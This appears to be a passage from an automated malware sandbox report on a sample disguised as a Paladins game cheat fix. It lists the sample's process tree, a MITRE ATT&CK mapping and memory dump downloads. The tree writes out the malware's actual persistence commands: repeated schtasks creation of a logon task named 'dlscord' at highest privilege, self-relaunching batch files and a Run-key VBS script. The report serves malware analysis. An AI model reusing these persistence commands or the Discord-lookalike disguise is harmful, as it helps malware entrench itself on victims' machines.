    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:760
    - - C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:600
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:3688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tMa0YDtHoEj0.bat" "
        6⤵
        
        PID:428
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4040
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:1028
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        8⤵
        Creates scheduled task(s)
        
        PID:1256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QRGv00BqgBxJ.bat" "
        8⤵
        
        PID:1084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:1980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        Runs ping.exe
        
        PID:1220
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        10⤵
        Creates scheduled task(s)
        
        PID:3668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\i86bos2Gsg9R.bat" "
        10⤵
        
        PID:3004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        Runs ping.exe
        
        PID:3192
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3708
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        12⤵
        Creates scheduled task(s)
        
        PID:3264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MMawzvNotngS.bat" "
        12⤵
        
        PID:1028
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:3396
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        Runs ping.exe
        
        PID:1576
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        14⤵
        Creates scheduled task(s)
        
        PID:1468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dlCIspZtap9Z.bat" "
        14⤵
        
        PID:2724
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:2132
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
        Runs ping.exe
        
        PID:1940
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        16⤵
        Creates scheduled task(s)
        
        PID:3188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OxfbGIHB6kwt.bat" "
        16⤵
        
        PID:3240
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:968
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        Runs ping.exe
        
        PID:3304
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3896
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        18⤵
        Creates scheduled task(s)
        
        PID:3288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Pa5HvcqTQcGP.bat" "
        18⤵
        
        PID:2068
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:3368
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        Runs ping.exe
        
        PID:2600
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3312
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        20⤵
        Creates scheduled task(s)
        
        PID:3184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\H8ndRKEnTzpM.bat" "
        20⤵
        
        PID:700
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:2464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        Runs ping.exe
        
        PID:3940
        
        C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe
        
        "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord\dlscord.exe" /rl HIGHEST /f
        22⤵
        Creates scheduled task(s)
        
        PID:3052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Nqjv1ZSOCGtc.bat" "
        22⤵
        
        PID:2216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:2208
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        Runs ping.exe
        
        PID:2964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')"
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2032

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  2⤵
  - Adds Run key to start application
  PID:3204

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/364-917-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/364-918-0x0000000005440000-0x0000000005441000-memory.dmp

Filesize
4KB

Download
memory/600-1010-0x000000001B170000-0x000000001B172000-memory.dmp

Filesize
8KB

Download
memory/920-696-0x0000000000CF2000-0x0000000000CF3000-memory.dmp

Filesize
4KB

Download
memory/920-724-0x0000000000CF3000-0x0000000000CF4000-memory.dmp

Filesize
4KB

Download
memory/920-694-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

Filesize
4KB

Download
memory/1044-801-0x0000000000CA3000-0x0000000000CA4000-memory.dmp

Filesize
4KB

Download
memory/1044-783-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/1044-785-0x0000000000CA2000-0x0000000000CA3000-memory.dmp

Filesize
4KB

Download
memory/1104-1023-0x00000000014D0000-0x00000000014D2000-memory.dmp

Filesize
8KB

Download
memory/1460-130-0x00000000070C2000-0x00000000070C3000-memory.dmp

Filesize
4KB

Download
memory/1460-156-0x0000000008A90000-0x0000000008A91000-memory.dmp

Filesize
4KB

Download
memory/1460-153-0x0000000009CC0000-0x0000000009CC1000-memory.dmp

Filesize
4KB

Download
memory/1460-133-0x0000000007E20000-0x0000000007E21000-memory.dmp

Filesize
4KB

Download
memory/1460-127-0x00000000070C0000-0x00000000070C1000-memory.dmp

Filesize
4KB

Download
memory/1460-316-0x00000000070C4000-0x00000000070C6000-memory.dmp

Filesize
8KB

Download
memory/1460-137-0x00000000080E0000-0x00000000080E1000-memory.dmp

Filesize
4KB

Download
memory/1460-131-0x00000000075B0000-0x00000000075B1000-memory.dmp

Filesize
4KB

Download
memory/1460-123-0x0000000006F80000-0x0000000006F81000-memory.dmp

Filesize
4KB

Download
memory/1460-119-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/1460-145-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/1460-175-0x000000000A840000-0x000000000A841000-memory.dmp

Filesize
4KB

Download
memory/1460-181-0x00000000099D0000-0x00000000099D1000-memory.dmp

Filesize
4KB

Download
memory/1460-139-0x00000000072B0000-0x00000000072B1000-memory.dmp

Filesize
4KB

Download
memory/1460-121-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/1460-315-0x00000000070C3000-0x00000000070C4000-memory.dmp

Filesize
4KB

Download
memory/1468-1107-0x0000000001300000-0x0000000001302000-memory.dmp

Filesize
8KB

Download
memory/1772-896-0x0000000006DA3000-0x0000000006DA4000-memory.dmp

Filesize
4KB

Download
memory/1772-847-0x0000000006DA2000-0x0000000006DA3000-memory.dmp

Filesize
4KB

Download
memory/1772-846-0x0000000006DA0000-0x0000000006DA1000-memory.dmp

Filesize
4KB

Download
memory/1780-987-0x000000001B210000-0x000000001B212000-memory.dmp

Filesize
8KB

Download
memory/1780-845-0x00000000070B3000-0x00000000070B4000-memory.dmp

Filesize
4KB

Download
memory/1780-815-0x00000000070B0000-0x00000000070B1000-memory.dmp

Filesize
4KB

Download
memory/1780-816-0x00000000070B2000-0x00000000070B3000-memory.dmp

Filesize
4KB

Download
memory/2032-986-0x0000000001052000-0x0000000001053000-memory.dmp

Filesize
4KB

Download
memory/2032-985-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/2032-1009-0x0000000001053000-0x0000000001054000-memory.dmp

Filesize
4KB

Download
memory/2152-755-0x00000000068B3000-0x00000000068B4000-memory.dmp

Filesize
4KB

Download
memory/2152-725-0x00000000068B0000-0x00000000068B1000-memory.dmp

Filesize
4KB

Download
memory/2152-726-0x00000000068B2000-0x00000000068B3000-memory.dmp

Filesize
4KB

Download
memory/2264-898-0x0000000000E00000-0x0000000000E01000-memory.dmp

Filesize
4KB

Download
memory/2264-939-0x0000000000E03000-0x0000000000E04000-memory.dmp

Filesize
4KB

Download
memory/2264-900-0x0000000000E02000-0x0000000000E03000-memory.dmp

Filesize
4KB

Download
memory/2320-903-0x0000000005050000-0x00000000050EC000-memory.dmp

Filesize
624KB

Download
memory/2404-1061-0x0000000000DD0000-0x0000000000DD2000-memory.dmp

Filesize
8KB

Download
memory/2412-1037-0x000000001B590000-0x000000001B592000-memory.dmp

Filesize
8KB

Download
memory/2860-953-0x0000000001122000-0x0000000001123000-memory.dmp

Filesize
4KB

Download
memory/2860-952-0x0000000001120000-0x0000000001121000-memory.dmp

Filesize
4KB

Download
memory/2860-984-0x0000000001123000-0x0000000001124000-memory.dmp

Filesize
4KB

Download
memory/3152-183-0x00000000095A0000-0x00000000095A1000-memory.dmp

Filesize
4KB

Download
memory/3152-172-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/3152-125-0x0000000007260000-0x0000000007261000-memory.dmp

Filesize
4KB

Download
memory/3152-135-0x0000000007970000-0x0000000007971000-memory.dmp

Filesize
4KB

Download
memory/3152-180-0x00000000091D0000-0x00000000091D1000-memory.dmp

Filesize
4KB

Download
memory/3152-128-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/3152-122-0x0000000000D40000-0x0000000000D41000-memory.dmp

Filesize
4KB

Download
memory/3152-141-0x0000000008050000-0x0000000008051000-memory.dmp

Filesize
4KB

Download
memory/3152-146-0x0000000000D40000-0x0000000000D41000-memory.dmp

Filesize
4KB

Download
memory/3152-158-0x0000000009020000-0x0000000009053000-memory.dmp

Filesize
204KB

Download
memory/3152-143-0x0000000008220000-0x0000000008221000-memory.dmp

Filesize
4KB

Download
memory/3152-165-0x0000000009000000-0x0000000009001000-memory.dmp

Filesize
4KB

Download
memory/3152-120-0x0000000000D40000-0x0000000000D41000-memory.dmp

Filesize
4KB

Download
memory/3152-182-0x00000000048B3000-0x00000000048B4000-memory.dmp

Filesize
4KB

Download
memory/3152-129-0x00000000048B2000-0x00000000048B3000-memory.dmp

Filesize
4KB

Download
memory/3312-1097-0x0000000000F10000-0x0000000000F12000-memory.dmp

Filesize
8KB

Download
memory/3368-441-0x0000000001053000-0x0000000001054000-memory.dmp

Filesize
4KB

Download
memory/3368-440-0x000000007F2C0000-0x000000007F2C1000-memory.dmp

Filesize
4KB

Download
memory/3368-409-0x0000000001052000-0x0000000001053000-memory.dmp

Filesize
4KB

Download
memory/3368-408-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/3572-693-0x0000000001113000-0x0000000001114000-memory.dmp

Filesize
4KB

Download
memory/3572-659-0x0000000001110000-0x0000000001111000-memory.dmp

Filesize
4KB

Download
memory/3572-660-0x0000000001112000-0x0000000001113000-memory.dmp

Filesize
4KB

Download
memory/3592-1073-0x0000000002E10000-0x0000000002E12000-memory.dmp

Filesize
8KB

Download
memory/3708-1049-0x0000000001140000-0x0000000001142000-memory.dmp

Filesize
8KB

Download
memory/3832-756-0x0000000004E10000-0x0000000004E11000-memory.dmp

Filesize
4KB

Download
memory/3832-757-0x0000000004E12000-0x0000000004E13000-memory.dmp

Filesize
4KB

Download
memory/3832-782-0x0000000004E13000-0x0000000004E14000-memory.dmp

Filesize
4KB

Download
memory/3896-1085-0x000000001BD60000-0x000000001BD62000-memory.dmp

Filesize
8KB

Download